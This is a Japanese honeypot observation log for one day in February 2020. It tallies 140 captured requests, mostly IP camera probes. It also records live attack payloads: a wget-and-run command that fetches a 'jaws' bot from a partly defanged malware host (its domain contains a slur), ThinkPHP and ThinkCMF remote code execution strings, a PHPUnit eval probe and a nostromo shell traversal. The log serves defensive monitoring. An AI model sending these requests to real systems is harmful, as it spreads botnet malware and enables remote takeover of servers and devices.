23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(329日目)

2020/02/09(日)

トータルは140件でした。

ハンティングログは以下です。

114.26.224[.]191 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
43 アクセス GET /
37 調査 GET /script
7 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
6 調査 GET /is_test
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 PHPUnit脆弱性を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 nostromo nhttpdの脆弱性を狙った通信 POST /.%0d./.%0d./.%0d./.%0d./bin/sh
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 MVPower DVRの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 不明 GET /dd/
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 不正中継の試み CONNECT ip.ws.126.net:443
1 IPカメラ調査 GET /webcapture.jpg?command=snap&channel=1?COUNTER
1 IPカメラ調査 GET /videostream.cgi?user=admin&pwd=
1 IPカメラ調査 GET /video/mjpg.cgi
1 IPカメラ調査 GET /snap.jpg?JpegSize=M&JpegCam=1&r=COUNTER
1 IPカメラ調査 GET /shot.jpg?rnd=654321
1 IPカメラ調査 GET /out.jpg?q=30&id=0.1317044913727916&r=COUNTER
1 IPカメラ調査 GET /oneshotimage1?COUNTER
1 IPカメラ調査 GET /mjpg/video.mjpg
1 IPカメラ調査 GET /mjpeg.cgi
1 IPカメラ調査 GET /live.jpg?&&&COUNTER
1 IPカメラ調査 GET /jpg/image.jpg?COUNTER
1 IPカメラ調査 GET /img/video.mjpeg
1 IPカメラ調査 GET /image?speed=0
1 IPカメラ調査 GET /cgi-bin/viewer/video.jpg?r=COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=6&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=3&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=2&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=1&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=0&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/faststream.jpg?stream=half&fps=15&rand=COUNTER
1 IPカメラ調査 GET /cgi-bin/camera?resolution=640&quality=1&Language=0&COUNTER
1 IPカメラ調査 GET /cam_1.cgi
1 IPカメラ調査 GET /axis-cgi/mjpg/video.cgi?camera=&resolution=640x480
1 IPカメラ調査 GET /SnapshotJPEG?Resolution=640x480&Quality=Clarity&COUNTER
1 IPカメラ調査 GET /GetData.cgi?CH=1
1 IPカメラ調査 GET /?action=stream
1 IPカメラ調査 GET /-wvhttp-01-/GetOneShot?image_size=640x480&frame_count=1000000000